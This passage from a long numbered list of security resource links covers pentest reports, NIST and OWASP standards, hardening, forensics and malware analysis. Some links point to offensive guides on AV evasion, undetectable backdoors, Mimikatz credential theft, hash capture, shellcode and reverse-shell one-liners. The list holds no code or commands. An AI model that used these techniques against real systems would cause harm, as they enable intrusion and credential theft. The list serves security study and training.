https://pastebin.com/si2ThQPP
-1293-Sans:
https://pastebin.com/MKiSnjLm
-1294-Metasploit Next Level:
https://pastebin.com/0jC1BUiv
-1295-Just playing around....:
https://pastebin.com/gHXPzf6B
-1296-Red Team Course:
https://pastebin.com/YUYSXNpG
-1297-New Exploit Development 2018:
https://pastebin.com/xaRxgYqQ
-1298-Good reviews of CTP/OSCE (in no particular order)::
https://pastebin.com/RSPbatip
-1299-Vulnerability Research Engineering Bookmarks Collection v1.0:
https://pastebin.com/8mUhjGSU
-1300-Professional-hacker's Pastebin :
https://pastebin.com/u/Professional-hacker
-1301-Google Cheat Sheet:
http://www.googleguide.com/print/adv_op_ref.pdf
-1302-Shodan for penetration testers:
https://www.defcon.org/images/defcon-18/dc-18-presentations/Schearer/DEFCON-18-Schearer-SHODAN.pdf
-1303-Linux networking tools:
https://gist.github.com/miglen/70765e663c48ae0544da08c07006791f
-1304-DNS spoofing with NetHunter:
https://cyberarms.wordpress.com/category/nethunter-tutorial/
-1305-Tips on writing a penetration testing report:
https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343
-1306-Technical penetration report sample:
https://tbgsecurity.com/wordpress/wp-content/uploads/2016/11/Sample-Penetration-Test-Report.pdf
-1307-Nessus sample reports:
https://www.tenable.com/products/nessus/sample-reports
-1308-Sample penetration testing report:
https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf
-1309-jonh-the-ripper-cheat-sheet:
https://countuponsecurity.com/2015/06/14/jonh-the-ripper-cheat-sheet/
-1310-ultimate guide to cracking foreign character passwords using hashcat:
http://www.netmux.com/blog/ultimate-guide-to-cracking-foreign-character-passwords-using-has
-1311-Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III:
https://www.unix-ninja.com/p/Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III
-1312-cracking story how i cracked over 122 million sha1 and md5 hashed passwords:
http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/
-1313-CSA (Cloud Security Alliance) Security White Papers:
https://cloudsecurityalliance.org/download/
-1314-NIST Security Considerations in the System Development Life Cycle:
https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-64r2.pdf
-1315-ISO 29100 information technology security techniques privacy framework:
https://www.iso.org/standard/45123.html
-1316-NIST National Checklist Program:
https://nvd.nist.gov/ncp/repository
-1317-OWASP Guide to Cryptography:
https://www.owasp.org/index.php/Guide_to_Cryptography
-1318-NVD (National Vulnerability Database):
https://nvd.nist.gov/
-1319-CVE details:
https://cvedetails.com/
-1320-CIS Cybersecurity Tools:
https://www.cisecurity.org/cybersecurity-tools/
-1321-Security aspects of virtualization by ENISA:
https://www.enisa.europa.eu/publications/security-aspects-of-virtualization/
-1322-CIS Benchmarks also provides a security guide for VMware, Docker, and Kubernetes:
https://www.cisecurity.org/cis-benchmarks/
-1323-OpenStack's hardening of the virtualization layer provides a secure guide to building the virtualization layer:
https://docs.openstack.org/security-guide/compute/hardening-the-virtualization-layers.html
-1324-Docker security:
https://docs.docker.com/engine/security/security/
-1325-Microsoft Security Development Lifecycle:
http://www.microsoft.com/en-us/SDL/
-1326-OWASP SAMM Project:
https://www.owasp.org/index.php/OWASP_SAMM_Project
-1327-CWE/SANS Top 25 Most Dangerous Software Errors:
https://cwe.mitre.org/top25/
-1329-OWASP Vulnerable Web Applications Directory Project:
https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project
-1330-CERT Secure Coding Standards:
https://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards
-1331-NIST Special Publication 800-53:
https://nvd.nist.gov/800-53
-1332-SAFECode Security White Papers:
https://safecode.org/publications/
-1333-Microsoft Threat Modeling tool 2016:
https://aka.ms/tmt2016/
-1334-Apache Metron for real-time big data security:
http://metron.apache.org/documentation/
-1335-Introducing OCTAVE Allegro: Improving the Information Security Risk Assessment Process:
https://resources.sei.cmu.edu/asset_files/TechnicalReport/2007_005_001_14885.pdf
-1336-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems:
http://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-18r1.pdf
-1337-ITU-T X.805 (10/2003) Security architecture for systems providing end- to-end communications:
https://www.itu.int/rec/dologin_pub.asp?lang=e&id=T-REC-X.805-200310-I!!PDF-E&type=items
-1338-ETSI TS 102 165-1 V4.2.1 (2006-12) : Method and proforma for Threat, Risk, Vulnerability Analysis:
http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.01_60/ts_10216501v040201p.pdf
-1339-SAFECode Fundamental Practices for Secure Software Development:
https://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf
-1340-NIST 800-64 Security Considerations in the System Development Life Cycle:
https://csrc.nist.gov/publications/detail/sp/800-64/rev-2/final
-1341-SANS A Security Checklist for Web Application Design:
https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389
-1342-Best Practices for implementing a Security Awareness Program:
https://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Practices_for_Implementing_Security_Awareness_Program.pdf
-1343-ETSI TS 102 165-1 V4.2.1 (2006-12): Method and proforma for Threat, Risk, Vulnerability Analysis:
http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.03_60/ts_10216501v040203p.pdf
-1344-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems:
https://csrc.nist.gov/publications/detail/sp/800-18/rev-1/final
-1345-SafeCode Tactical Threat Modeling:
https://safecode.org/safecodepublications/tactical-threat-modeling/
-1346-SANS Web Application Security Design Checklist:
https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389
-1347-Data Anonymization for production data dumps:
https://github.com/sunitparekh/data-anonymization
-1348-SANS Continuous Monitoring—What It Is, Why It Is Needed, and How to Use It:
https://www.sans.org/reading-room/whitepapers/analyst/continuous-monitoring-is-needed-35030
-1349-Guide to Computer Security Log Management:
https://ws680.nist.gov/publication/get_pdf.cfm?pub_id=50881
-1350-Malware Indicators:
https://github.com/citizenlab/malware-indicators
-1351-OSINT Threat Feeds:
https://www.circl.lu/doc/misp/feed-osint/
-1352-SANS How to Use Threat Intelligence effectively:
https://www.sans.org/reading-room/whitepapers/analyst/threat-intelligence-is-effectively-37282
-1353-NIST 800-150 Guide to Cyber Threat Information Sharing:
https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-150.pdf
-1354-Securing Web Application Technologies Checklist:
https://software-security.sans.org/resources/swat
-1355-Firmware Security Training:
https://github.com/advanced-threat-research/firmware-security-training
-1356-Burp Suite Bootcamp:
https://pastebin.com/5sG7Rpg5
-1357-Web app hacking:
https://pastebin.com/ANsw7WRx
-1358-XSS Payload:
https://pastebin.com/EdxzE4P1
-1359-XSS Filter Evasion Cheat Sheet:
https://pastebin.com/bUutGfSy
-1360-Persistence using RunOnceEx – Hidden from Autoruns.exe:
https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
-1361-Windows Operating System Archaeology:
https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
-1362-How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky:
https://www.prodefence.org/how-to-backdoor-windows-10-using-an-android-phone-usb-rubber-ducky/
-1363-Malware Analysis using Osquery :
https://hackernoon.com/malware-analysis-using-osquery-part-2-69f08ec2ecec
-1364-Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals :
https://holdmybeersecurity.com/2019/02/27/sysinternals-for-windows-incident-response/
-1365-Userland registry hijacking:
https://3gstudent.github.io/Userland-registry-hijacking/
-1366-Malware Hiding Techniques to Watch for: AlienVault Labs:
https://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs
-1367- Full text of "Google hacking for penetration testers" :
https://archive.org/stream/pdfy-TPtNL6_ERVnbod0r/Google+Hacking+-+For+Penetration+Tester_djvu.txt
-1368- Full text of "Long, Johnny Google Hacking For Penetration Testers" :
https://archive.org/stream/LongJohnnyGoogleHackingForPenetrationTesters/Long%2C%20Johnny%20-%20Google%20Hacking%20for%20Penetration%20Testers_djvu.txt
-1369- Full text of "Coding For Penetration Testers" :
https://archive.org/stream/CodingForPenetrationTesters/Coding%20for%20Penetration%20Testers_djvu.txt
-1370- Full text of "Hacking For Dummies" :
https://archive.org/stream/HackingForDummies/Hacking%20For%20Dummies_djvu.txt
-1371-Full text of "Wiley. Hacking. 5th. Edition. Jan. 2016. ISBN. 1119154685. Profescience.blogspot.com" :
https://archive.org/stream/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com_djvu.txt
-1372- Full text of "Social Engineering The Art Of Human Hacking" :
https://archive.org/stream/SocialEngineeringTheArtOfHumanHacking/Social%20Engineering%20-%20The%20Art%20of%20Human%20Hacking_djvu.txt
-1373- Full text of "CYBER WARFARE" :
https://archive.org/stream/CYBERWARFARE/CYBER%20WARFARE_djvu.txt
-1374-Full text of "NSA DOCID: 4046925 Untangling The Web: A Guide To Internet Research" :
https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt
-1375- Full text of "sectools" :
https://archive.org/stream/sectools/hack-the-stack-network-security_djvu.txt
-1376- Full text of "Aggressive network self-defense" :
https://archive.org/stream/pdfy-YNtvDJueGZb1DCDA/Aggressive%20Network%20Self-Defense_djvu.txt
-1377-Community Texts:
https://archive.org/details/opensource?and%5B%5D=%28language%3Aeng+OR+language%3A%22English%22%29+AND+subject%3A%22google%22
-1378- Full text of "Cyber Spying - Tracking (sometimes).PDF (PDFy mirror)" :
https://archive.org/stream/pdfy-5-Ln_yPZ22ondBJ8/Cyber%20Spying%20-%20Tracking%20%28sometimes%29_djvu.txt
-1379- Full text of "Enzyclopedia Of Cybercrime" :
https://archive.org/stream/EnzyclopediaOfCybercrime/Enzyclopedia%20Of%20Cybercrime_djvu.txt
-1380- Full text of "Information Security Management Handbook" :
https://archive.org/stream/InformationSecurityManagementHandbook/Information%20Security%20Management%20Handbook_djvu.txt
-1381- Full text of "ARMArchitecture Reference Manual" :
https://archive.org/stream/ARMArchitectureReferenceManual/DetectionOfIntrusionsAndMalwareAndVulnerabilityAssessment2016_djvu.txt
-1382- Full text of "Metasploit The Penetration Tester S Guide" :
https://archive.org/stream/MetasploitThePenetrationTesterSGuide/Metasploit-The+Penetration+Tester+s+Guide_djvu.txt
-1383-Tips & tricks to master Google’s search engine:
https://medium.com/infosec-adventures/google-hacking-39599373be7d
-1384-Ethical Google Hacking - Sensitive Doc Dork (Part 2) :
https://securing-the-stack.teachable.com/courses/ethical-google-hacking-1/lectures/3877866
-1385- Google Hacking Secrets:the Hidden Codes of Google :
https://www.ma-no.org/en/security/google-hacking-secrets-the-hidden-codes-of-google
-1386-google hacking:
https://www.slideshare.net/SamNizam/3-google-hacking
-1387-How Penetration Testers Use Google Hacking:
https://www.cqure.nl/kennisplatform/how-penetration-testers-use-google-hacking
-1388-Free Automated Malware Analysis Sandboxes and Services:
https://zeltser.com/automated-malware-analysis/
-1389-How to get started with Malware Analysis and Reverse Engineering:
https://0ffset.net/miscellaneous/how-to-get-started-with-malware-analysis/
-1390-Handy Tools And Websites For Malware Analysis:
https://www.informationsecuritybuzz.com/articles/handy-tools-and-websites/
-1391-Dynamic Malware Analysis:
https://prasannamundas.com/share/dynamic-malware-analysis/
-1392-Intro to Radare2 for Malware Analysis:
https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/
-1393-Detecting malware through static and dynamic techniques:
https://technical.nttsecurity.com/.../detecting-malware-through-static-and-dynamic-tec...
-1394-Malware Analysis Tutorial : Tricks for Confusing Static Analysis Tools:
https://www.prodefence.org/malware-analysis-tutorial-tricks-confusing-static-analysis-tools
-1395-Malware Analysis Lab At Home In 5 Steps:
https://ethicalhackingguru.com/malware-analysis-lab-at-home-in-5-steps/
-1396-Malware Forensics Guide - Static and Dynamic Approach:
https://www.yeahhub.com/malware-forensics-guide-static-dynamic-approach/
-1397-Top 30 Bug Bounty Programs in 2019:
https://www.guru99.com/bug-bounty-programs.html
-1398-Introduction - Book of BugBounty Tips:
https://gowsundar.gitbook.io/book-of-bugbounty-tips/
-1399-List of bug bounty writeups:
https://pentester.land/list-of-bug-bounty-writeups.html
-1400-Tips From A Bugbounty Hunter:
https://www.secjuice.com/bugbounty-hunter/
-1401-Cross Site Scripting (XSS) - Book of BugBounty Tips:
https://gowsundar.gitbook.io/book-of-bugbounty-tips/cross-site-scripting-xss
-1402-BugBountyTips:
https://null0xp.wordpress.com/tag/bugbountytips/
-1403-Xss Filter Bypass Payloads:
www.oroazteca.net/mq67/xss-filter-bypass-payloads.html
-1404-Bug Bounty Methodology:
https://eforensicsmag.com/bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0
-1405-GDB cheat-sheet for exploit development:
www.mannulinux.org/2017/01/gdb-cheat-sheet-for-exploit-development.html
-1406-A Study in Exploit Development - Part 1: Setup and Proof of Concept :
https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept
-1407-Exploit development tutorial :
https://www.computerweekly.com/tutorial/Exploit-development-tutorial-Part-Deux
-1408-exploit code development:
http://www.phreedom.org/presentations/exploit-code-development/exploit-code-development.pdf
-1409-“Help Defeat Denial of Service Attacks: Step-by-Step”:
http://www.sans.org/dosstep/
-1410-Internet Firewalls: Frequently Asked Questions:
http://www.interhack.net/pubs/fwfaq/
-1411-Service Name and Transport Protocol Port Number:
http://www.iana.org/assignments/port-numbers
-1412-10 Useful Open Source Security Firewalls for Linux Systems:
https://www.tecmint.com/open-source-security-firewalls-for-linux-systems/
-1413-40 Linux Server Hardening Security Tips:
https://www.cyberciti.biz/tips/linux-security.html
-1414-Linux hardening: A 15-step checklist for a secure Linux server :
https://www.computerworld.com/.../linux-hardening-a-15-step-checklist-for-a-secure-linux-server
-1415-25 Hardening Security Tips for Linux Servers:
https://www.tecmint.com/linux-server-hardening-security-tips/
-1416-How to Harden Unix/Linux Systems & Close Security Gaps:
https://www.beyondtrust.com/blog/entry/harden-unix-linux-systems-close-security-gaps
-1417-34 Linux Server Security Tips & Checklists for Sysadmins:
https://www.process.st/server-security/
-1418-Linux Hardening:
https://www.slideshare.net/MichaelBoelen/linux-hardening
-1419-23 Hardening Tips to Secure your Linux Server:
https://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/
-1420-What is the Windows Registry? :
https://www.computerhope.com/jargon/r/registry.htm
-1421-Windows Registry, Everything You Need To Know:
https://www.gammadyne.com/registry.htm
-1422-Windows Registry Tutorial:
https://www.akadia.com/services/windows_registry_tutorial.html
-1423-5 Tools to Scan a Linux Server for Malware and Rootkits:
https://www.tecmint.com/scan-linux-for-malware-and-rootkits/
-1424-Subdomain takeover dew to missconfigured project settings for Custom domain .:
https://medium.com/bugbountywriteup/subdomain-takeover-dew-to-missconfigured-project-settings-for-custom-domain-46e90e702969
-1425-Massive Subdomains p0wned:
https://medium.com/bugbountywriteup/massive-subdomains-p0wned-80374648336e
-1426-Subdomain Takeover: Basics:
https://0xpatrik.com/subdomain-takeover-basics/
-1427-Subdomain Takeover: Finding Candidates:
https://0xpatrik.com/subdomain-takeover-candidates/
-1428-Bugcrowd's Domain & Subdomain Takeover!:
https://bugbountypoc.com/bugcrowds-domain-takeover/
-1429-What Are Subdomain Takeovers, How to Test and Avoid Them?:
https://dzone.com/articles/what-are-subdomain-takeovers-how-to-test-and-avoid
-1430-Finding Candidates for Subdomain Takeovers:
https://jarv.is/notes/finding-candidates-subdomain-takeovers/
-1431-Subdomain takeover of blog.snapchat.com:
https://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7
-1432-Hostile Subdomain takeove:
https://labs.detectify.com/tag/hostile-subdomain-takeover/
-1433-Microsoft Account Takeover Vulnerability Affecting 400 Million Users:
https://www.safetydetective.com/blog/microsoft-outlook/
-1434-What is Subdomain Hijack/Takeover Vulnerability? How to Identify? & Exploit It?:
https://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/
-1435-Subdomain takeover detection with AQUATONE:
https://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/
-1436-A hostile subdomain takeover! – Breaking application security:
https://evilenigma.blog/2019/03/12/a-hostile-subdomain-takeover/
-1437-Web Development Reading List:
https://www.smashingmagazine.com/2017/03/web-development-reading-list-172/
-1438-CSRF Attack can lead to Stored XSS:
https://medium.com/bugbountywriteup/csrf-attack-can-lead-to-stored-xss-f40ba91f1e4f
-1439-What is Mimikatz: The Beginner's Guide | Varonis:
https://www.varonis.com/bog/what-is-mimikatz
-1440-Preventing Mimikatz Attacks :
https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5
-1441-Mimikatz tutorial: How it hacks Windows passwords, credentials:
https://searchsecurity.techtarget.com/.../Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials
-1442-Mimikatz: Walkthrough [Updated 2019]:
https://resources.infosecinstitute.com/mimikatz-walkthrough/
-1443-Mimikatz -Windows Tutorial for Beginner:
https://hacknpentest.com/mimikatz-windows-tutorial-beginners-guide-part-1/
-1444-Mitigations against Mimikatz Style Attacks:
https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks
-1445-Exploring Mimikatz - Part 1 :
https://blog.xpnsec.com/exploring-mimikatz-part-1/
-1446-Powershell AV Evasion. Running Mimikatz with PowerLine:
https://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html
-1447-How to Steal Windows Credentials with Mimikatz and Metasploit:
https://www.hackingloops.com/mimikatz/
-1448-Retrieving NTLM Hashes without touching LSASS:
https://www.andreafortuna.org/2018/03/26/retrieving-ntlm-hashes-without-touching-lsass-the-internal-monologue-attack/
-1449-From Responder to NT Authority\SYSTEM:
https://medium.com/bugbountywriteup/from-responder-to-nt-authority-system-39abd3593319
-1450-Getting Creds via NTLMv2:
https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html
-1451-Living off the land: stealing NetNTLM hashes:
https://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html
-1452-(How To) Using Responder to capture passwords on a Windows:
www.securityflux.com/?p=303
-1453-Pwning with Responder - A Pentester's Guide:
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
-1454-LLMNR and NBT-NS Poisoning Using Responder:
https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
-1455-Responder - Ultimate Guide :
https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/
-1456-Responder - CheatSheet:
https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/
-1457-LM, NTLM, Net-NTLMv2, oh my! :
https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4
-1458-SMB Relay Attack Tutorial:
https://intrinium.com/smb-relay-attack-tutorial
-1459-Cracking NTLMv2 responses captured using responder:
https://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/
-1460-Skip Cracking Responder Hashes and Relay Them:
https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/
-1461-Metasploit's First Antivirus Evasion Modules:
https://blog.rapid7.com/2018/10/09/introducing-metasploits-first-evasion-module/
-1462-Evading Anti-virus Part 1: Infecting EXEs with Shellter:
https://www.hackingloops.com/evading-anti-virus-shellter/
-1463-Evading AV with Shellter:
https://www.securityartwork.es/2018/11/02/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-i/
-1464-Shellter-A Shellcode Injecting Tool :
https://www.hackingarticles.in/shellter-a-shellcode-injecting-tool/
-1465-Bypassing antivirus programs using SHELLTER:
https://myhackstuff.com/shellter-bypassing-antivirus-programs/
-1466-John the Ripper step-by-step tutorials for end-users :
openwall.info/wiki/john/tutorials
-1467-Beginners Guide for John the Ripper (Part 1):
https://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/
-1468-John the Ripper Basics Tutorial:
https://ultimatepeter.com/john-the-ripper-basics-tutorial/
-1469-Crack Windows password with john the ripper:
https://www.securitynewspaper.com/2018/11/27/crack-windows-password-with-john-the-ripper/
-1470-Getting Started Cracking Password Hashes with John the Ripper :
https://www.tunnelsup.com/getting-started-cracking-password-hashes/
-1471-Shell code exploit with Buffer overflow:
https://medium.com/@jain.sm/shell-code-exploit-with-buffer-overflow-8d78cc11f89b
-1472-Shellcoding for Linux and Windows Tutorial :
www.vividmachines.com/shellcode/shellcode.html
-1473-Buffer Overflow Practical Examples :
https://0xrick.github.io/binary-exploitation/bof5/
-1474-Msfvenom shellcode analysis:
https://snowscan.io/msfvenom-shellcode-analysis/
-1475-Process Continuation Shellcode:
https://azeria-labs.com/process-continuation-shellcode/
-1476-Dynamic Shellcode Execution:
https://www.countercept.com/blog/dynamic-shellcode-execution/
-1477-Tutorials: Writing shellcode to binary files:
https://www.fuzzysecurity.com/tutorials/7.html
-1478-Creating Shellcode for an Egg Hunter :
https://securitychops.com/2018/05/26/slae-assignment-3-egghunter-shellcode.html
-1479-How to: Shellcode to reverse bind a shell with netcat :
www.hackerfall.com/story/shellcode-to-reverse-bind-a-shell-with-netcat
-1480-Bashing the Bash — Replacing Shell Scripts with Python:
https://medium.com/capital-one-tech/bashing-the-bash-replacing-shell-scripts-with-python-d8d201bc0989
-1481-How to See All Devices on Your Network With nmap on Linux:
https://www.howtogeek.com/.../how-to-see-all-devices-on-your-network-with-nmap-on-linux
-1482-A Complete Guide to Nmap:
https://www.edureka.co/blog/nmap-tutorial/
-1483-Nmap from Beginner to Advanced :
https://resources.infosecinstitute.com/nmap/
-1484-Using Wireshark: Identifying Hosts and Users:
https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/
-1485-tshark tutorial and filter examples:
https://hackertarget.com/tshark-tutorial-and-filter-examples/
-1486-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example:
https://www.guru99.com/fuzz-testing.html
-1487-Tutorial: Dumb Fuzzing - Peach Community Edition:
community.peachfuzzer.com/v3/TutorialDumbFuzzing.html
-1488-HowTo: ExploitDev Fuzzing:
https://hansesecure.de/2018/03/howto-exploitdev-fuzzing/
-1489-Fuzzing with Metasploit:
https://www.corelan.be/?s=fuzzing
-1490-Fuzzing – how to find bugs automagically using AFL:
9livesdata.com/fuzzing-how-to-find-bugs-automagically-using-afl/
-1491-Introduction to File Format Fuzzing & Exploitation:
https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3
-1492-0x3 Python Tutorial: Fuzzer:
https://www.primalsecurity.net/0x3-python-tutorial-fuzzer/
-1493-Hunting For Bugs With AFL:
https://research.aurainfosec.io/hunting-for-bugs-101/
-1494-Fuzzing: The New Unit Testing:
https://www.slideshare.net/DmitryVyukov/fuzzing-the-new-unit-testing
-1495-Fuzzing With Peach Framework:
https://www.terminatio.org/fuzzing-peach-framework-full-tutorial-download/
-1496-How we found a tcpdump vulnerability using cloud fuzzing:
https://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/
-1497-Finding a Fuzzer: Peach Fuzzer vs. Sulley:
https://medium.com/@jtpereyda/finding-a-fuzzer-peach-fuzzer-vs-sulley-1fcd6baebfd4
-1498-Android malware analysis:
https://www.slideshare.net/rossja/android-malware-analysis-71109948
-1499-15+ Malware Analysis Tools & Techniques :
https://www.template.net/business/tools/malware-analysis/
-1500-30 Online Malware Analysis Sandboxes / Static Analyzers:
https://medium.com/@su13ym4n/15-online-sandboxes-for-malware-analysis-f8885ecb8a35
-1501-Linux Command Line Forensics and Intrusion Detection Cheat Sheet:
https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/
-1502-Cheat Sheets - SANS Digital Forensics:
https://digital-forensics.sans.org/community/cheat-sheets
-1503-Breach detection with Linux filesystem forensics:
https://opensource.com/article/18/4/linux-filesystem-forensics
-1504-Digital Forensics Cheat Sheets Collection :
https://neverendingsecurity.wordpress.com/digital-forensics-cheat-sheets-collection/
-1505-Security Incident Survey Cheat Sheet for Server Administrators:
https://zeltser.com/security-incident-survey-cheat-sheet/
-1506-Digital forensics: A cheat sheet :
https://www.techrepublic.com/article/digital-forensics-the-smart-persons-guide/
-1507-Windows Registry Forensics using 'RegRipper' Command-Line on Linux:
https://www.pinterest.cl/pin/794815034207804059/
-1508-Windows IR Live Forensics Cheat Sheet:
https://www.cheatography.com/koriley/cheat-sheets/windows-ir-live-forensics/
-1509-10 Best Known Forensics Tools That Works on Linux:
https://linoxide.com/linux-how-to/forensics-tools-linux/
-1510-Top 20 Free Digital Forensic Investigation Tools for SysAdmins:
https://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/
-1511-Windows Volatile Memory Acquisition & Forensics 2018:
https://medium.com/@lucideus/windows-volatile-memory-acquisition-forensics-2018-lucideus-forensics-3f297d0e5bfd
-1512-PowerShell Cheat Sheet :
https://www.digitalforensics.com/blog/powershell-cheat-sheet-2/
-1513-Forensic Artifacts: evidences of program execution on Windows systems:
https://www.andreafortuna.org/forensic-artifacts-evidences-of-program-execution-on-windows-systems
-1514-How to install a CPU?:
https://www.computer-hardware-explained.com/how-to-install-a-cpu.html
-1515-How To Upgrade and Install a New CPU or Motherboard:
https://www.howtogeek.com/.../how-to-upgrade-and-install-a-new-cpu-or-motherboard-or-both
-1516-Installing and Troubleshooting CPUs:
www.pearsonitcertification.com/articles/article.aspx?p=1681054&seqNum=2
-1517-15 FREE Pastebin Alternatives You Can Use Right Away:
https://www.rootreport.com/pastebin-alternatives/
-1518-Basic computer troubleshooting steps:
https://www.computerhope.com/basic.htm
-1519-18 Best Websites to Learn Computer Troubleshooting and Tech support:
http://transcosmos.co.uk/best-websites-to-learn-computer-troubleshooting-and-tech-support
-1520-Post Exploitation with PowerShell Empire 2.3.0 :
https://www.yeahhub.com/post-exploitation-powershell-empire-2-3-0-detailed-tutorial/
-1521-Windows Persistence with PowerShell Empire :
https://www.hackingarticles.in/windows-persistence-with-powershell-empire/
-1522-powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial:
https://www.dudeworks.com/powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial
-1523-Bypassing Anti-Virtus & Hacking Windows 10 Using Empire :
https://zsecurity.org/bypassing-anti-virtus-hacking-windows-10-using-empire/
-1524-Hacking with Empire – PowerShell Post-Exploitation Agent :
https://www.prodefence.org/hacking-with-empire-powershell-post-exploitation-agent/
-1525-Hacking Windows Active Directory Full guide:
www.kalitut.com/hacking-windows-active-directory-full.html
-1526-PowerShell Empire for Post-Exploitation:
https://www.hackingloops.com/powershell-empire/
-1527-Generate A One-Liner – Welcome To LinuxPhilosophy!:
linuxphilosophy.com/rtfm/more/empire/generate-a-one-liner/
-1528-CrackMapExec - Ultimate Guide:
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
-1529-PowerShell Logging and Security:
https://www.secjuice.com/enterprise-powershell-protection-logging/
-1530-Create your own FUD Backdoors with Empire:
http://blog.extremehacking.org/blog/2016/08/25/create-fud-backdoors-empire/
-1531-PowerShell Empire Complete Tutorial For Beginners:
https://video.hacking.reviews/2019/06/powershell-empire-complete-tutorial-for.html
-1532-Bash Bunny: Windows Remote Shell using Metasploit & PowerShell:
https://cyberarms.wordpress.com/.../bash-bunny-windows-remote-shell-using-metasploit-powershell
-1533-Kerberoasting - Stealing Service Account Credentials:
https://www.scip.ch/en/?labs.20181011
-1534-Automating Mimikatz with Empire and DeathStar :
https://blog.stealthbits.com/automating-mimikatz-with-empire-and-deathstar/
-1535-Windows oneliners to get shell :
https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/
-1536-ObfuscatedEmpire :
https://cobbr.io/ObfuscatedEmpire.html
-1537-Pentesting with PowerShell in six steps:
https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/
-1538-Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM):
https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm
-1539-PowerShell Security Best Practices:
https://www.digitalshadows.com/blog-and-research/powershell-security-best-practices/
-1540-You can detect PowerShell attacks:
https://www.slideshare.net/Hackerhurricane/you-can-detect-powershell-attacks
-1541-Detecting and Preventing PowerShell Attacks:
https://www.eventsentry.com/.../powershell-pw3rh311-detecting-preventing-powershell-attacks
-1542-Detecting Offensive PowerShell Attack Tools – Active Directory Security:
https://adsecurity.org/?p=2604
-1543-An Internal Pentest Audit Against Active Directory:
https://www.exploit-db.com/docs/46019
-1544-A complete Active Directory Penetration Testing Checklist :
https://gbhackers.com/active-directory-penetration-testing-checklist/
-1545-Active Directory | Penetration Testing Lab:
https://pentestlab.blog/tag/active-directory/
-1546-Building and Attacking an Active Directory lab with PowerShell :
https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell
-1547-Penetration Testing in Windows Server Active Directory using Metasploit:
https://www.hackingarticles.in/penetration-testing-windows-server-active-directory-using-metasploit-part-1
-1548-Red Team Penetration Testing – Going All the Way (Part 2 of 3) :
https://www.anitian.com/red-team-testing-going-all-the-way-part2/
-1549-Penetration Testing Active Directory, Part II:
https://www.jishuwen.com/d/2Mtq
-1550-Gaining Domain Admin from Outside Active Directory:
https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html
-1551-Post Exploitation Cheat Sheet:
https://0xsecurity.com/blog/some-hacking-techniques/post-exploitation-cheat-sheet
-1552-Windows post-exploitation :
https://github.com/emilyanncr/Windows-Post-Exploitation
-1553-OSCP - Windows Post Exploitation :
